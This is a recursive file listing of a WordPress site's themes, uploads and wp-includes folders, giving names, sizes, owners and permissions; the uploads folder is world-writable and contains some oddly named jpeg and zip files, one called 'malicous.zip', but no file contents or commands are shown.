drwxr-xr-x 3 root root 4.0K Jun  3  2016 genericons
-rw-r--r-- 1 root root 2.4K Jun  3  2016 header.php
-rw-r--r-- 1 root root 2.7K Jun  3  2016 image.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 images
drwxr-xr-x 2 root root 4.0K Jun  3  2016 inc
-rw-r--r-- 1 root root 1.6K Jun  3  2016 index.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 js
drwxr-xr-x 2 root root 4.0K Jun  3  2016 languages
-rw-r--r-- 1 root root 1.2K Jun  3  2016 page.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 page-templates
-rw-r--r-- 1 root root  16K Jun  3  2016 rtl.css
-rw-r--r-- 1 root root 603K Jun  3  2016 screenshot.png
-rw-r--r-- 1 root root 1.3K Jun  3  2016 search.php
-rw-r--r-- 1 root root  340 Jun  3  2016 sidebar-content.php
-rw-r--r-- 1 root root  395 Jun  3  2016 sidebar-footer.php
-rw-r--r-- 1 root root  848 Jun  3  2016 sidebar.php
-rw-r--r-- 1 root root 1.1K Jun  3  2016 single.php
-rw-r--r-- 1 root root  76K Jun  3  2016 style.css
-rw-r--r-- 1 root root 1.6K Jun  3  2016 tag.php
-rw-r--r-- 1 root root 2.4K Jun  3  2016 taxonomy-post_format.php

/var/www/https/blogblog/wp-content/themes/twentyfourteen/css:
total 48K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  12K Jun  3  2016 editor-style.css
-rw-r--r-- 1 root root  25K Jun  3  2016 ie.css

/var/www/https/blogblog/wp-content/themes/twentyfourteen/genericons:
total 116K
drwxr-xr-x 3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 1.4K Jun  3  2016 COPYING.txt
-rw-r--r-- 1 root root  19K Jun  3  2016 example.html
drwxr-xr-x 2 root root 4.0K Jun  3  2016 font
-rw-r--r-- 1 root root  31K Jun  3  2016 genericons.css
-rw-r--r-- 1 root root  18K Jun  3  2016 Genericons-Regular.otf
-rw-r--r-- 1 root root  18K Jun  3  2016 LICENSE.txt
-rw-r--r-- 1 root root 5.8K Jun  3  2016 README.txt

/var/www/https/blogblog/wp-content/themes/twentyfourteen/genericons/font:
total 112K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  15K Jun  3  2016 genericons-regular-webfont.eot
-rw-r--r-- 1 root root  40K Jun  3  2016 genericons-regular-webfont.svg
-rw-r--r-- 1 root root  27K Jun  3  2016 genericons-regular-webfont.ttf
-rw-r--r-- 1 root root  17K Jun  3  2016 genericons-regular-webfont.woff

/var/www/https/blogblog/wp-content/themes/twentyfourteen/images:
total 16K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 1.2K Jun  3  2016 pattern-dark.svg
-rw-r--r-- 1 root root  540 Jun  3  2016 pattern-light.svg

/var/www/https/blogblog/wp-content/themes/twentyfourteen/inc:
total 64K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 2.2K Jun  3  2016 back-compat.php
-rw-r--r-- 1 root root 4.5K Jun  3  2016 custom-header.php
-rw-r--r-- 1 root root 5.6K Jun  3  2016 customizer.php
-rw-r--r-- 1 root root  15K Jun  3  2016 featured-content.php
-rw-r--r-- 1 root root 7.1K Jun  3  2016 template-tags.php
-rw-r--r-- 1 root root 9.7K Jun  3  2016 widgets.php

/var/www/https/blogblog/wp-content/themes/twentyfourteen/js:
total 52K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  950 Jun  3  2016 customizer.js
-rw-r--r-- 1 root root  329 Jun  3  2016 featured-content-admin.js
-rw-r--r-- 1 root root 4.5K Jun  3  2016 functions.js
-rw-r--r-- 1 root root 2.4K Jun  3  2016 html5.js
-rw-r--r-- 1 root root  497 Jun  3  2016 keyboard-image-navigation.js
-rw-r--r-- 1 root root  19K Jun  3  2016 slider.js

/var/www/https/blogblog/wp-content/themes/twentyfourteen/languages:
total 20K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  11K Jun  3  2016 twentyfourteen.pot

/var/www/https/blogblog/wp-content/themes/twentyfourteen/page-templates:
total 16K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 1.3K Jun  3  2016 contributors.php
-rw-r--r-- 1 root root  939 Jun  3  2016 full-width.php

/var/www/https/blogblog/wp-content/themes/twentythirteen:
total 312K
drwxr-xr-x 8 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  4  2016 ..
-rw-r--r-- 1 root root  842 Jun  3  2016 404.php
-rw-r--r-- 1 root root 1.8K Jun  3  2016 archive.php
-rw-r--r-- 1 root root 1.1K Jun  3  2016 author-bio.php
-rw-r--r-- 1 root root 1.7K Jun  3  2016 author.php
-rw-r--r-- 1 root root 1.2K Jun  3  2016 category.php
-rw-r--r-- 1 root root 1.9K Jun  3  2016 comments.php
-rw-r--r-- 1 root root 1.4K Jun  3  2016 content-aside.php
-rw-r--r-- 1 root root 1.5K Jun  3  2016 content-audio.php
-rw-r--r-- 1 root root 1.3K Jun  3  2016 content-chat.php
-rw-r--r-- 1 root root 2.0K Jun  3  2016 content-gallery.php
-rw-r--r-- 1 root root 1.8K Jun  3  2016 content-image.php
-rw-r--r-- 1 root root 1.5K Jun  3  2016 content-link.php
-rw-r--r-- 1 root root  956 Jun  3  2016 content-none.php
-rw-r--r-- 1 root root 2.3K Jun  3  2016 content.php
-rw-r--r-- 1 root root 1.4K Jun  3  2016 content-quote.php
-rw-r--r-- 1 root root 1.2K Jun  3  2016 content-status.php
-rw-r--r-- 1 root root 1.8K Jun  3  2016 content-video.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 css
-rw-r--r-- 1 root root  814 Jun  3  2016 footer.php
-rw-r--r-- 1 root root  19K Jun  3  2016 functions.php
drwxr-xr-x 3 root root 4.0K Jun  3  2016 genericons
-rw-r--r-- 1 root root 2.0K Jun  3  2016 header.php
-rw-r--r-- 1 root root 3.1K Jun  3  2016 image.php
drwxr-xr-x 3 root root 4.0K Jun  3  2016 images
drwxr-xr-x 2 root root 4.0K Jun  3  2016 inc
-rw-r--r-- 1 root root 1023 Jun  3  2016 index.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 js
drwxr-xr-x 2 root root 4.0K Jun  3  2016 languages
-rw-r--r-- 1 root root 1.6K Jun  3  2016 page.php
-rw-r--r-- 1 root root  13K Jun  3  2016 rtl.css
-rw-r--r-- 1 root root  76K Jun  3  2016 screenshot.png
-rw-r--r-- 1 root root  860 Jun  3  2016 search.php
-rw-r--r-- 1 root root  472 Jun  3  2016 sidebar-main.php
-rw-r--r-- 1 root root  577 Jun  3  2016 sidebar.php
-rw-r--r-- 1 root root  600 Jun  3  2016 single.php
-rw-r--r-- 1 root root  54K Jun  3  2016 style.css
-rw-r--r-- 1 root root 1.2K Jun  3  2016 tag.php
-rw-r--r-- 1 root root 1.2K Jun  3  2016 taxonomy-post_format.php

/var/www/https/blogblog/wp-content/themes/twentythirteen/css:
total 32K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 8 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  13K Jun  3  2016 editor-style.css
-rw-r--r-- 1 root root 4.5K Jun  3  2016 ie.css

/var/www/https/blogblog/wp-content/themes/twentythirteen/genericons:
total 116K
drwxr-xr-x 3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 8 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 1.4K Jun  3  2016 COPYING.txt
-rw-r--r-- 1 root root  19K Jun  3  2016 example.html
drwxr-xr-x 2 root root 4.0K Jun  3  2016 font
-rw-r--r-- 1 root root  31K Jun  3  2016 genericons.css
-rw-r--r-- 1 root root  18K Jun  3  2016 Genericons-Regular.otf
-rw-r--r-- 1 root root  18K Jun  3  2016 LICENSE.txt
-rw-r--r-- 1 root root 5.8K Jun  3  2016 README.txt

/var/www/https/blogblog/wp-content/themes/twentythirteen/genericons/font:
total 112K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  15K Jun  3  2016 genericons-regular-webfont.eot
-rw-r--r-- 1 root root  40K Jun  3  2016 genericons-regular-webfont.svg
-rw-r--r-- 1 root root  27K Jun  3  2016 genericons-regular-webfont.ttf
-rw-r--r-- 1 root root  17K Jun  3  2016 genericons-regular-webfont.woff

/var/www/https/blogblog/wp-content/themes/twentythirteen/images:
total 36K
drwxr-xr-x 3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 8 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root   86 Jun  3  2016 dotted-line-2x.png
-rw-r--r-- 1 root root   85 Jun  3  2016 dotted-line-light-2x.png
-rw-r--r-- 1 root root   80 Jun  3  2016 dotted-line-light.png
-rw-r--r-- 1 root root   80 Jun  3  2016 dotted-line.png
drwxr-xr-x 2 root root 4.0K Jun  3  2016 headers
-rw-r--r-- 1 root root  829 Jun  3  2016 search-icon-2x.png
-rw-r--r-- 1 root root  422 Jun  3  2016 search-icon.png

/var/www/https/blogblog/wp-content/themes/twentythirteen/images/headers:
total 100K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  34K Jun  3  2016 circle.png
-rw-r--r-- 1 root root 7.9K Jun  3  2016 circle-thumbnail.png
-rw-r--r-- 1 root root  14K Jun  3  2016 diamond.png
-rw-r--r-- 1 root root 1.9K Jun  3  2016 diamond-thumbnail.png
-rw-r--r-- 1 root root  23K Jun  3  2016 star.png
-rw-r--r-- 1 root root 4.0K Jun  3  2016 star-thumbnail.png

/var/www/https/blogblog/wp-content/themes/twentythirteen/inc:
total 20K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 8 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 2.2K Jun  3  2016 back-compat.php
-rw-r--r-- 1 root root 6.5K Jun  3  2016 custom-header.php

/var/www/https/blogblog/wp-content/themes/twentythirteen/js:
total 20K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 8 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 3.6K Jun  3  2016 functions.js
-rw-r--r-- 1 root root 2.4K Jun  3  2016 html5.js
-rw-r--r-- 1 root root 1.2K Jun  3  2016 theme-customizer.js

/var/www/https/blogblog/wp-content/themes/twentythirteen/languages:
total 16K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 8 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 7.4K Jun  3  2016 twentythirteen.pot

/var/www/https/blogblog/wp-content/uploads:
total 24K
drwxrwxrwx 2 www-data www-data 4.0K Jul 22 21:38 .
drwxr-xr-x 5 root     root     4.0K Jun  4  2016 ..
-rw-r--r-- 1 www-data www-data 2.9K Jul 22 20:16 1320637793.jpeg
-rw-r--r-- 1 www-data www-data    0 Jul 22 20:09 1350418571.jpeg
-rw-r--r-- 1 www-data www-data 3.0K Jul 22 20:22 1742085432.jpeg
-rw-r--r-- 1 www-data www-data    0 Jul 22 20:15 199333654.jpeg
-rw-r--r-- 1 www-data www-data    0 Jul 22 20:07 512019819.jpeg
-rw-r--r-- 1 www-data www-data    0 Jul 22 20:21 599551779.jpeg
-rw-rw-rw- 1 www-data www-data 1.9K Jul 22 21:38 malicous.zip
-rw-rw-rw- 1 www-data www-data 1.5K Jul 22 21:27 RKmIVQPEJZ.zip

/var/www/https/blogblog/wp-includes:
total 4.2M
drwxr-xr-x 12 root root 4.0K Jun  3  2016 .
drwxr-xr-x  5 root root 4.0K Jun  4  2016 ..
-rw-r--r--  1 root root  26K Jun  3  2016 admin-bar.php
-rw-r--r--  1 root root  11K Jun  3  2016 atomlib.php
-rw-r--r--  1 root root  14K Jun  3  2016 author-template.php
-rw-r--r--  1 root root  13K Jun  3  2016 bookmark.php
-rw-r--r--  1 root root  12K Jun  3  2016 bookmark-template.php
-rw-r--r--  1 root root  19K Jun  3  2016 cache.php
-rw-r--r--  1 root root  25K Jun  3  2016 canonical.php
-rw-r--r--  1 root root  40K Jun  3  2016 capabilities.php
-rw-r--r--  1 root root  11K Jun  3  2016 category.php
-rw-r--r--  1 root root  47K Jun  3  2016 category-template.php
drwxr-xr-x  2 root root 4.0K Jun  3  2016 certificates
-rw-r--r--  1 root root 3.9K Jun  3  2016 class-feed.php
-rw-r--r--  1 root root  74K Jun  3  2016 class-http.php
-rw-r--r--  1 root root  33K Jun  3  2016 class-IXR.php
-rw-r--r--  1 root root  39K Jun  3  2016 class-json.php
-rw-r--r--  1 root root  24K Jun  3  2016 class-oembed.php
-rw-r--r--  1 root root 7.0K Jun  3  2016 class-phpass.php
-rw-r--r--  1 root root 109K Jun  3  2016 class-phpmailer.php
-rw-r--r--  1 root root  21K Jun  3  2016 class-pop3.php
-rw-r--r--  1 root root  89K Jun  3  2016 class-simplepie.php
-rw-r--r--  1 root root  28K Jun  3  2016 class-smtp.php
-rw-r--r--  1 root root  37K Jun  3  2016 class-snoopy.php
-rw-r--r--  1 root root  15K Jun  3  2016 class-wp-admin-bar.php
-rw-r--r--  1 root root 4.0K Jun  3  2016 class-wp-ajax-response.php
-rw-r--r--  1 root root  37K Jun  3  2016 class-wp-customize-control.php
-rw-r--r--  1 root root  43K Jun  3  2016 class-wp-customize-manager.php
-rw-r--r--  1 root root 7.6K Jun  3  2016 class-wp-customize-panel.php
-rw-r--r--  1 root root  11K Jun  3  2016 class-wp-customize-section.php
-rw-r--r--  1 root root  16K Jun  3  2016 class-wp-customize-setting.php
-rw-r--r--  1 root root  48K Jun  3  2016 class-wp-customize-widgets.php
-rw-r--r--  1 root root  13K Jun  3  2016 class.wp-dependencies.php
-rw-r--r--  1 root root  52K Jun  3  2016 class-wp-editor.php
-rw-r--r--  1 root root  12K Jun  3  2016 class-wp-embed.php
-rw-r--r--  1 root root 5.0K Jun  3  2016 class-wp-error.php
-rw-r--r--  1 root root 2.9K Jun  3  2016 class-wp-http-ixr-client.php
-rw-r--r--  1 root root  13K Jun  3  2016 class-wp-image-editor-gd.php
-rw-r--r--  1 root root  14K Jun  3  2016 class-wp-image-editor-imagick.php
-rw-r--r--  1 root root  12K Jun  3  2016 class-wp-image-editor.php
-rw-r--r--  1 root root  22K Jun  3  2016 class-wp.php
-rw-r--r--  1 root root 7.2K Jun  3  2016 class.wp-scripts.php
-rw-r--r--  1 root root 6.4K Jun  3  2016 class.wp-styles.php
-rw-r--r--  1 root root  39K Jun  3  2016 class-wp-theme.php
-rw-r--r--  1 root root  12K Jun  3  2016 class-wp-walker.php
-rw-r--r--  1 root root 177K Jun  3  2016 class-wp-xmlrpc-server.php
-rw-r--r--  1 root root  98K Jun  3  2016 comment.php
-rw-r--r--  1 root root  81K Jun  3  2016 comment-template.php
-rw-r--r--  1 root root 4.0K Jun  3  2016 compat.php
-rw-r--r--  1 root root  14K Jun  3  2016 cron.php
drwxr-xr-x  2 root root 4.0K Jun  3  2016 css
-rw-r--r--  1 root root  35K Jun  3  2016 date.php
-rw-r--r--  1 root root 7.9K Jun  3  2016 default-constants.php
-rw-r--r--  1 root root  19K Jun  3  2016 default-filters.php
-rw-r--r--  1 root root  52K Jun  3  2016 default-widgets.php
-rw-r--r--  1 root root  98K Jun  3  2016 deprecated.php
-rw-r--r--  1 root root 4.9K Jun  3  2016 feed-atom-comments.php
-rw-r--r--  1 root root 3.0K Jun  3  2016 feed-atom.php
-rw-r--r--  1 root root  18K Jun  3  2016 feed.php
-rw-r--r--  1 root root 2.6K Jun  3  2016 feed-rdf.php
-rw-r--r--  1 root root 3.7K Jun  3  2016 feed-rss2-comments.php
-rw-r--r--  1 root root 3.6K Jun  3  2016 feed-rss2.php
-rw-r--r--  1 root root 1.2K Jun  3  2016 feed-rss.php
drwxr-xr-x  2 root root 4.0K Jun  3  2016 fonts
-rw-r--r--  1 root root 142K Jun  3  2016 formatting.php
-rw-r--r--  1 root root 146K Jun  3  2016 functions.php
-rw-r--r--  1 root root 9.8K Jun  3  2016 functions.wp-scripts.php
-rw-r--r--  1 root root 7.3K Jun  3  2016 functions.wp-styles.php
-rw-r--r--  1 root root 104K Jun  3  2016 general-template.php
-rw-r--r--  1 root root  16K Jun  3  2016 http.php
drwxr-xr-x  2 root root 4.0K Jun  3  2016 ID3
drwxr-xr-x  6 root root 4.0K Jun  3  2016 images
drwxr-xr-x 11 root root 4.0K Jun  3  2016 js
-rw-r--r--  1 root root  43K Jun  3  2016 kses.php
-rw-r--r--  1 root root  31K Jun  3  2016 l10n.php
-rw-r--r--  1 root root 113K Jun  3  2016 link-template.php
-rw-r--r--  1 root root  24K Jun  3  2016 load.php
-rw-r--r--  1 root root  13K Jun  3  2016 locale.php
-rw-r--r--  1 root root 116K Jun  3  2016 media.php
-rw-r--r--  1 root root  43K Jun  3  2016 media-template.php
-rw-r--r--  1 root root  50K Jun  3  2016 meta.php
-rw-r--r--  1 root root  26K Jun  3  2016 ms-blogs.php
-rw-r--r--  1 root root 4.4K Jun  3  2016 ms-default-constants.php
-rw-r--r--  1 root root 3.8K Jun  3  2016 ms-default-filters.php
-rw-r--r--  1 root root 8.8K Jun  3  2016 ms-deprecated.php
-rw-r--r--  1 root root 2.6K Jun  3  2016 ms-files.php
-rw-r--r--  1 root root  76K Jun  3  2016 ms-functions.php
-rw-r--r--  1 root root  16K Jun  3  2016 ms-load.php
-rw-r--r--  1 root root 8.4K Jun  3  2016 ms-settings.php
-rw-r--r--  1 root root  29K Jun  3  2016 nav-menu.php
-rw-r--r--  1 root root  25K Jun  3  2016 nav-menu-template.php
-rw-r--r--  1 root root  44K Jun  3  2016 option.php
-rw-r--r--  1 root root 5.7K Jun  3  2016 pluggable-deprecated.php
-rw-r--r--  1 root root  78K Jun  3  2016 pluggable.php
-rw-r--r--  1 root root  30K Jun  3  2016 plugin.php
drwxr-xr-x  2 root root 4.0K Jun  3  2016 pomo
-rw-r--r--  1 root root 6.4K Jun  3  2016 post-formats.php
-rw-r--r--  1 root root 189K Jun  3  2016 post.php
-rw-r--r--  1 root root  56K Jun  3  2016 post-template.php
-rw-r--r--  1 root root 4.8K Jun  3  2016 post-thumbnail-template.php
-rw-r--r--  1 root root 130K Jun  3  2016 query.php
-rw-r--r--  1 root root  176 Jun  3  2016 registration-functions.php
-rw-r--r--  1 root root  176 Jun  3  2016 registration.php
-rw-r--r--  1 root root  19K Jun  3  2016 revision.php
-rw-r--r--  1 root root  65K Jun  3  2016 rewrite.php
-rw-r--r--  1 root root  189 Jun  3  2016 rss-functions.php
-rw-r--r--  1 root root  23K Jun  3  2016 rss.php
-rw-r--r--  1 root root  50K Jun  3  2016 script-loader.php
-rw-r--r--  1 root root  10K Jun  3  2016 session.php
-rw-r--r--  1 root root  12K Jun  3  2016 shortcodes.php
drwxr-xr-x  9 root root 4.0K Jun  3  2016 SimplePie
-rw-r--r--  1 root root 154K Jun  3  2016 taxonomy.php
-rw-r--r--  1 root root 2.7K Jun  3  2016 template-loader.php
-rw-r--r--  1 root root  14K Jun  3  2016 template.php
drwxr-xr-x  3 root root 4.0K Jun  3  2016 Text
drwxr-xr-x  2 root root 4.0K Jun  3  2016 theme-compat
-rw-r--r--  1 root root  62K Jun  3  2016 theme.php
-rw-r--r--  1 root root  24K Jun  3  2016 update.php
-rw-r--r--  1 root root  79K Jun  3  2016 user.php
-rw-r--r--  1 root root 5.2K Jun  3  2016 vars.php
-rw-r--r--  1 root root  619 Jun  3  2016 version.php
-rw-r--r--  1 root root  53K Jun  3  2016 widgets.php
-rw-r--r--  1 root root 1.1K Jun  3  2016 wlwmanifest.xml
-rw-r--r--  1 root root  84K Jun  3  2016 wp-db.php
-rw-r--r--  1 root root  15K Jun  3  2016 wp-diff.php

/var/www/https/blogblog/wp-includes/certificates:
total 248K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 12 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 240K Jun  3  2016 ca-bundle.crt

/var/www/https/blogblog/wp-includes/css:
total 612K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 12 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  24K Jun  3  2016 admin-bar.css
-rw-r--r--  1 root root  19K Jun  3  2016 admin-bar.min.css
-rw-r--r--  1 root root  24K Jun  3  2016 admin-bar-rtl.css
-rw-r--r--  1 root root  19K Jun  3  2016 admin-bar-rtl.min.css
-rw-r--r--  1 root root 9.0K Jun  3  2016 buttons.css
-rw-r--r--  1 root root 5.8K Jun  3  2016 buttons.min.css
-rw-r--r--  1 root root 9.0K Jun  3  2016 buttons-rtl.css
-rw-r--r--  1 root root 5.8K Jun  3  2016 buttons-rtl.min.css
-rw-r--r--  1 root root  45K Jun  3  2016 dashicons.css
-rw-r--r--  1 root root  43K Jun  3  2016 dashicons.min.css
-rw-r--r--  1 root root  38K Jun  3  2016 editor.css
-rw-r--r--  1 root root  29K Jun  3  2016 editor.min.css
-rw-r--r--  1 root root  38K Jun  3  2016 editor-rtl.css
-rw-r--r--  1 root root  29K Jun  3  2016 editor-rtl.min.css
-rw-r--r--  1 root root 6.1K Jun  3  2016 jquery-ui-dialog.css
-rw-r--r--  1 root root 4.7K Jun  3  2016 jquery-ui-dialog.min.css
-rw-r--r--  1 root root 6.1K Jun  3  2016 jquery-ui-dialog-rtl.css
-rw-r--r--  1 root root 4.7K Jun  3  2016 jquery-ui-dialog-rtl.min.css
-rw-r--r--  1 root root  47K Jun  3  2016 media-views.css
-rw-r--r--  1 root root  40K Jun  3  2016 media-views.min.css
-rw-r--r--  1 root root  47K Jun  3  2016 media-views-rtl.css
-rw-r--r--  1 root root  40K Jun  3  2016 media-views-rtl.min.css
-rw-r--r--  1 root root 2.3K Jun  3  2016 wp-auth-check.css
-rw-r--r--  1 root root 1.7K Jun  3  2016 wp-auth-check.min.css
-rw-r--r--  1 root root 2.3K Jun  3  2016 wp-auth-check-rtl.css
-rw-r--r--  1 root root 1.7K Jun  3  2016 wp-auth-check-rtl.min.css
-rw-r--r--  1 root root 3.8K Jun  3  2016 wp-pointer.css
-rw-r--r--  1 root root 3.0K Jun  3  2016 wp-pointer.min.css
-rw-r--r--  1 root root 3.8K Jun  3  2016 wp-pointer-rtl.css
-rw-r--r--  1 root root 3.0K Jun  3  2016 wp-pointer-rtl.min.css

/var/www/https/blogblog/wp-includes/fonts:
total 208K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 12 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  40K Jun  3  2016 dashicons.eot
-rw-r--r--  1 root root  89K Jun  3  2016 dashicons.svg
-rw-r--r--  1 root root  39K Jun  3  2016 dashicons.ttf
-rw-r--r--  1 root root  25K Jun  3  2016 dashicons.woff

/var/www/https/blogblog/wp-includes/ID3:
total 1012K
drwxr-xr-x  2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 12 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root  44K Jun  3  2016 getid3.lib.php
-rw-r--r--  1 root root  63K Jun  3  2016 getid3.php
-rw-r--r--  1 root root 1.3K Jun  3  2016 license.commercial.txt
-rw-r--r--  1 root root 1.4K Jun  3  2016 license.txt
-rw-r--r--  1 root root  19K Jun  3  2016 module.audio.ac3.php
-rw-r--r--  1 root root  11K Jun  3  2016 module.audio.dts.php
-rw-r--r--  1 root root  18K Jun  3  2016 module.audio.flac.php
-rw-r--r--  1 root root  97K Jun  3  2016 module.audio.mp3.php
-rw-r--r--  1 root root  36K Jun  3  2016 module.audio.ogg.php
-rw-r--r--  1 root root 125K Jun  3  2016 module.audio-video.asf.php
-rw-r--r--  1 root root  25K Jun  3  2016 module.audio-video.flv.php
-rw-r--r--  1 root root 102K Jun  3  2016 module.audio-video.matroska.php
-rw-r--r--  1 root root 116K Jun  3  2016 module.audio-video.quicktime.php
-rw-r--r--  1 root root 117K Jun  3  2016 module.audio-video.riff.php
-rw-r--r--  1 root root  16K Jun  3  2016 module.tag.apetag.php
-rw-r--r--  1 root root  12K Jun  3  2016 module.tag.id3v1.php
-rw-r--r--  1 root root 133K Jun  3  2016 module.tag.id3v2.php
-rw-r--r--  1 root root  11K Jun  3  2016 module.tag.lyrics3.php
-rw-r--r--  1 root root  25K Jun  3  2016 readme.txt

/var/www/https/blogblog/wp-includes/images:
total 152K
drwxr-xr-x  6 root root 4.0K Jun  3  2016 .
drwxr-xr-x 12 root root 4.0K Jun  3  2016 ..
-rw-r--r--  1 root root 4.0K Jun  3  2016 admin-bar-sprite-2x.png
-rw-r--r--  1 root root 2.5K Jun  3  2016 admin-bar-sprite.png
-rw-r--r--  1 root root 1.7K Jun  3  2016 arrow-pointer-blue-2x.png
-rw-r--r--  1 root root  793 Jun  3  2016 arrow-pointer-blue.png
-rw-r--r--  1 root root   43 Jun  3  2016 blank.gif
drwxr-xr-x  2 root root 4.0K Jun  3  2016 crystal
-rw-r--r--  1 root root   84 Jun  3  2016 down_arrow-2x.gif
-rw-r--r--  1 root root   59 Jun  3  2016 down_arrow.gif
-rw-r--r--  1 root root 1.4K Jun  3  2016 icon-pointer-flag-2x.png
-rw-r--r--  1 root root  783 Jun  3  2016 icon-pointer-flag.png
drwxr-xr-x  2 root root 4.0K Jun  3  2016 media
-rw-r--r--  1 root root 1.3K Jun  3  2016 rss-2x.png
-rw-r--r--  1 root root  608 Jun  3  2016 rss.png
drwxr-xr-x  2 root root 4.0K Jun  3  2016 smilies
-rw-r--r--  1 root root 8.4K Jun  3  2016 spinner-2x.gif
-rw-r--r--  1 root root 4.1K Jun  3  2016 spinner.gif
-rw-r--r--  1 root root  354 Jun  3  2016 toggle-arrow-2x.png
-rw-r--r--  1 root root  289 Jun  3  2016 toggle-arrow.png
-rw-r--r--  1 root root 3.5K Jun  3  2016 uploader-icons-2x.png
-rw-r--r--  1 root root 1.6K Jun  3  2016 uploader-icons.png
drwxr-xr-x  2 root root 4.0K Jun  3  2016 wlw
-rw-r--r--  1 root root  15K Jun  3  2016 wpicons-2x.png
-rw-r--r--  1 root root 7.0K Jun  3  2016 wpicons.png
-rw-r--r--  1 root root 9.0K Jun  3  2016 wpspin-2x.gif
-rw-r--r--  1 root root 2.2K Jun  3  2016 wpspin.gif
-rw-r--r--  1 root root  825 Jun  3  2016 xit-2x.gif
-rw-r--r--  1 root root  181 Jun  3  2016 xit.gif

/var/www/https/blogblog/wp-includes/images/crystal:
total 48K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 6 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 2.4K Jun  3  2016 archive.png
-rw-r--r-- 1 root root 2.2K Jun  3  2016 audio.png
-rw-r--r-- 1 root root 1.6K Jun  3  2016 code.png
-rw-r--r-- 1 root root  453 Jun  3  2016 default.png
-rw-r--r-- 1 root root 2.1K Jun  3  2016 document.png
-rw-r--r-- 1 root root 2.2K Jun  3  2016 interactive.png
-rw-r--r-- 1 root root  149 Jun  3  2016 license.txt
-rw-r--r-- 1 root root 2.4K Jun  3  2016 spreadsheet.png
-rw-r--r-- 1 root root  670 Jun  3  2016 text.png
-rw-r--r-- 1 root root 1.4K Jun  3  2016 video.png

/var/www/https/blogblog/wp-includes/images/media:
total 44K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 6 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  417 Jun  3  2016 archive.png
-rw-r--r-- 1 root root  382 Jun  3  2016 audio.png
-rw-r--r-- 1 root root  274 Jun  3  2016 code.png
-rw-r--r-- 1 root root  168 Jun  3  2016 default.png
-rw-r--r-- 1 root root  200 Jun  3  2016 document.png
-rw-r--r-- 1 root root  319 Jun  3  2016 interactive.png
-rw-r--r-- 1 root root  188 Jun  3  2016 spreadsheet.png
-rw-r--r-- 1 root root  188 Jun  3  2016 text.png
-rw-r--r-- 1 root root  283 Jun  3  2016 video.png

/var/www/https/blogblog/wp-includes/images/smilies:
total 112K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 6 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 1007 Jun  3  2016 frownie.png
-rw-r--r-- 1 root root  169 Jun  3  2016 icon_arrow.gif
-rw-r--r-- 1 root root  173 Jun  3  2016 icon_biggrin.gif
-rw-r--r-- 1 root root  170 Jun  3  2016 icon_confused.gif
-rw-r--r-- 1 root root  172 Jun  3  2016 icon_cool.gif
-rw-r--r-- 1 root root  490 Jun  3  2016 icon_cry.gif
-rw-r--r-- 1 root root  170 Jun  3  2016 icon_eek.gif
-rw-r--r-- 1 root root  241 Jun  3  2016 icon_evil.gif
-rw-r--r-- 1 root root  236 Jun  3  2016 icon_exclaim.gif
-rw-r--r-- 1 root root  174 Jun  3  2016 icon_idea.gif
-rw-r--r-- 1 root root  333 Jun  3  2016 icon_lol.gif
-rw-r--r-- 1 root root  172 Jun  3  2016 icon_mad.gif
